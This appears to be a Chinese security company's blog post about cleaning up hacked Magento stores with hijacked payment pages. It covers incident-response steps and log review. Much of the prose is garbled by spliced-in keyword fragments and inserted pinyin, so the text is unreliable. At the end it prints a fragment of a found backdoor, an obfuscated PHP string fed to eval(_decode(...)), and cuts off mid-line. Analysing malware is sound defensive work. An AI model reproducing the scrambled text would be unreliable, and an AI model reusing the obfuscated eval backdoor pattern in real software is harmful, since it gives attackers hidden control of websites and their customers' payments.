
地 址:北京市顺义区66号
电 话:15323008686
网址:yntbgc.com
邮 箱:48845791@qq.com
Magento是贸网最受欢迎的外贸电商框架之一,很多企业已经在其基础上(shang)进行了二次开发。站被支付转处然而,入侵对于使用2.x版本的被劫老系统来说,安全问(wen)题也成为了一大难题。持跳有些客户在找我们SINESAFE做网站安全服务之(zhi)前,贸网客(ke)户也找过建站的站被支付转处公司去清除后门,建站公司也将系统迁移升级到了最新的入侵2.4.4版本,但后来发现问题并没有完全的被劫解决,还(hai)是持(chi)跳会(hui)反复的(de)被篡改代码和用户的支付页面被劫持跳转,问题的贸网根源是代(dai)码里已经被(bei)黑客植入后门了,数据库也被(bei)留了木马病毒,站被支付转处(chu)这个时候不光是(shi)入侵要升级magento到最新版本,还得要把木马后门给彻底的被劫清理掉,做好安全加固和防护,持跳才能彻底的解决这个问(wen)题。
因为2022年以前的Maganto 2.x版本存在很多(duo)漏洞,像(xiang)远程代码执行漏洞、SQL注入漏洞都是比较(jiao)高危的,如果(guo)不及时升级到2.x版本就很容易被黑客(ke)攻击。但是,即使升级到2.x版本,也不代表完(wan)全解决(jue)了安全问题。因此,针对这种情况,企业需要认真评估自身的安全风险,并采取措施进行安全加固。具(ju)体来说,可以(yi)通过加强访问控制、强化数据保护等方式来提高系统安全性。同时,定期对系统进行漏洞扫描和代码安全审计,及时修补代码漏洞和加强网站的安全防护,也是减轻安全风险的有效措施。

我(wo)们SINE安全处理了很多外贸客户使用magento被黑客(ke)入侵的(de)安全问(wen)题,虽然在国内Magento并不被广泛使用,但它在国外(wai)却十分流行。然而,一些老版本的Magento很容易被攻击者通过框架拿shell等方式入侵。以下就是(shi)我们SINE安全处理客户的(de)magento被黑客攻击的过程记录:

排查黑客攻击的问题时,很容易陷入(ru)只分析日志等细节(jie)的误区。其实,在进行任何分析之前,我们都(dou)需要(yao)先做以下几件事情:

第一,核实信息。这就像(xiang)是我们在(zai)找错问题之前,需要先了解出现(xian)问题的具体细节和当前服务器的环境情(qing)况(kuang)。
第二,断开(kai)服务器的外网链接,保障安全。这(zhe)就像是(shi)把自家的大门关上,不让坏人轻松进入。
第三,保存(cun)服务器的环境,以及现场的(de)各种信息,如端口网络、应(ying)用程序、日志文件等。这样,就像是在(zai)证据链中留下关键(jian)的(de)线索,更有利于我们查找和分(fen)析问题,而且要注意不要有写操作哦!
在现场环境中,虽然我们可能(neng)无法找到确切的(de)问题所在,但(dan)是(shi)可以(yi)通过查看历史日志,来检查是(shi)否存在服务器linux系统被提权等可疑行为。如果使(shi)用了chkrootkit、rkthunter和(he)lynis等安全扫描工具,也未发现任(ren)何问题,那还是建议客户考虑更换服务(wu)器,以避免潜在的(de)安全风险。
我们SINE安全(quan)首先从web层面去看,分析了网站访问日志,nginx日志,数据库日志发(fa)现有许多黑客攻击的痕迹,利(li)用(yong)的都是Magento的(de)一些(xie)高危漏洞进行的,也可(ke)以说明网站被入侵是由于(yu)magento低版本存(cun)在漏洞导致,我们立即展开对系(xi)统(tong)以及源代码的安全审计,人工(gong)去分析每(mei)一行代码,通过我们的检测,发现4个木马后门,如下:
bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>
foreach (glob("/www/wwwroot/dev.